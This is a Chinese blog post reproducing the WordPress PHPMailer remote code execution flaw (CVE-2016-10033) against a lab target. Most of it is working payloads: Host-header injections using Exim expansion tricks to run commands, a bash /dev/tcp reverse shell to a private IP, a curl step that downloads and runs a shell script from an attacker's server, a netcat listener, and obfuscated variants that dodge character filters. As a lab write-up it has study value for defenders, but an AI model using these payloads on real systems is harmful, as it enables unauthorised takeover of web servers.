漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)

本文介绍如何复现WordPress中PHPMailer组件导致的远程代码执行漏洞(CVE-2016-10033),包括漏洞利用的具体步骤及反弹Shell的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)

名称:
WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。
复现过程
1、打开靶场:在这里插入图片描述2、找到登录页面:
在这里插入图片描述3、假设我们知道存在的真实用户名,admin 进入漏洞页面

在这里插入图片描述
4、点击Get new passwd并使用BP抓包,修改host的值为:

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}}

在这里插入图片描述5、放包后,可看到靶机相应目录生成了succes文件
在这里插入图片描述6、反弹shell原命令:

target(any -froot@localhost -be ${run{bash -i >& /dev/tcp/192.168.245.128/4444 0>&1}} null)

注:特殊字符不能执行,只能转换成空格和 / 来执行,所以要分以下几个步骤:
(1)、开启http服务器,用来wget脚本

python3 http.server 80

(2)、下载我们的反弹shell脚本

target(any -froot@localhost -be ${run{/usr/bin/curl -o/tmp/shell 192.168.30.129/shell.sh}} null) 

(3)、执行/tmp下的shell脚本:

target(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null)  

(4)、nc监听相对应端口

nc -lvvp 4444

(5)、替换后需要抓包修改host值,发送下面两条命令:

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.30.129${substr{0}{1}{$spool_directory}}shell.sh}} null) 
target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null) 

最后点个赞吧!!!!
参考链接:
https://www.cnblogs.com/ssooking/p/8893264.html
http://paper.seebug.org/161/

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值